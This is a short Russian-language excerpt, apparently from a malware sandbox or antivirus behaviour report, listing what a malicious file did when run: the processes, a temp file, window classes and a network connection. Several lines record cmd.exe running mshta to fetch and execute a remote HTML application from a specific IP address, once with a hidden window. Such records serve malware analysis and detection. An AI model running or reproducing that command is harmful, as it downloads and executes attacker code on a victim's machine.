Техническая информация
- '<SYSTEM32>\cmd.exe' /c mshta http://91.240.118.168/qqqw/aaas/se.html
- C:\Documents\user\locals~1\temp\~dfa778.tmp
- '91.##0.118.168':80
- ClassName: 'MsoHelp11' WindowName: ''
- ClassName: 'AgentAnim' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c mshta http://91.240.118.168/qqqw/aaas/se.html' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://91.240.118.168/qqqw/aaas/se.html